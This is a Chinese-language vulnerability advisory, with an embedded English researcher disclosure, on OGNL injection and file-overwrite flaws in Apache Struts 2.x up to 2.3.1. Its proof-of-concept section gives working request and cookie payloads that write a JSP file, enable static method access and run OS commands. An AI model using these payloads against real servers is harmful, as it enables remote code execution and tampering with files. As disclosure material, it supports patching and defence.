漏洞起因
输入验证错误
危险等级
中
影响系统
Apache Struts 2.x
不受影响系统
危害
远程攻击者可以利用漏洞执行任意命令或覆盖任意文件。
攻击所需条件
攻击者必须访问Apache Struts。
漏洞信息
Apache Struts是一款建立Java web应用程序的开放源代码架构。
Apache Struts存在安全漏洞,允许攻击者利用漏洞执行任意命令或覆盖任意文件。
-Apache Struts存在一个输入过滤错误,如果遇到转换错误可被利用注入和执行任意Java代码。
-当处理COOKIE名称过程中CookieInterceptor类没有正确限制对某些静态模式的访问,可被利用执行任意命令。
-部分未明输入在用于创建文件之前没有由ParameterInterceptor进行正确过滤,可被利用通过目录遍历攻击创建或覆盖任意文件。
测试方法
Vulnerability overview/description:
-----------------------------------
To prevent attackers calling arbitrary methods within parameters the flag
"xwork.MethodAccessor.denyMethodExecution" is set to "true" and the
SecurityMemberAccess field "allowStaticMethodAccess" is set to "false" by
default. Also, to prevent access to context variables an improved character
whitelist for paramteter names is applied in XWork's ParametersInterceptor since
Struts 2.2.1.1:
acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[\\(\\)_'\\s]+";
Under certain circumstances these restrictions can be bypassed to execute
malicious Java code.
1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)
When an exception occurs while applying parameter values to properties the
value is evaluated as OGNL expression. For example this occurs when setting a
string value to a property with type integer. Since the values are not
filtered an attacker can abuse the power of the OGNL language to execute
arbitrary Java code leading to remote command execution. This issue has been
reported (https://issues.apache.org/jira/browse/WW-3668) and was fixed in
Struts 2.2.3.1. However the ability to execute arbitrary Java code has been
overlooked.
2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)
The character whitelist for parameter names is not applied to Struts
CookieInterceptor. When Struts is configured to handle cookie names, an
attacker can execute arbitrary system commands with static method access to
Java functions. Therefore the flag "allowStaticMethodAccess" can be set to
true within the request.
3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)
Accessing the flag "allowStaticMethodAccess" within parameters is prohibited
since Struts 2.2.3.1. An attacker can still access public constructors with
only one parameter of type String to create new Java objects and access their
setters with only one parameter of type String. This can be abused for example
to create and overwrite arbitrary files. To inject forbidden characters to the
filename an uninitialized string property can be used.
4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)
While not being a security vulnerability itself, please note that applications
running in developer mode and using Struts DebuggingInterceptor are prone to
remote command execution as well. While applications should never run in
developer mode during production, developers should be aware that doing so not
only has performance issues (as documented) but also a critical security
impact.
Proof of concept:
-----------------
1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)
Given Test.java has an property "id" of type Integer or Long and appropriate
getter and setter methods:
long id;
Given test.jsp with result name=input is configured for action "Test":
struts.xml:
<action name="Test">
<result name="input">test.jsp</result>
</action>
The following request will trigger an exception, the value will be evaluated
as OGNL expression and arbitrary Java code can be executed:
/Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b'
An attacker can also overwrite flags that will allow direct OS command execution:
/Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
If test.jsp displays the property "id" the result of the Java code evaluation
can be accessed:
<%@ taglib prefix="s" uri="/struts-tags" %>
<s:property value="id" />
2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)
Given struts.xml is configured to handle all cookie names (independent of
limited cookie values):
<action name="Test">
<interceptor-ref name="cookie">
<param name="cookiesName">*</param>
<param name="cookiesValue">1,2</param>
</interceptor-ref>
<result ...>
</action>
The following HTTP header will execute an OS command when sent to Test.action:
Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1
3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)
Given Test.java has an uninitialized property "name" of type String:
String name; // +getter+setter
The following request will create/overwrite the file "C:/sec-consult.txt"
(empty file):
/Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1
The existence of the property 'x' used in these examples is of no importance.
4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)
Given struts.xml is configured to run in developer mode and to use the
debugging interceptor:
<constant name="struts.devMode" value="true" />
<action name="Test">
<interceptor-ref name="debugging" />
<result ...>
</action>
The following request will execute arbitrary OGNL expressions leading to remote command execution:
/Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')
厂商解决方案
Apache Struts 2.3.1.1已经修复此漏洞,建议用户下载使用:
http://struts.apache.org/
漏洞提供者
Bruce Phillips and Johannes Dahse
评论关闭。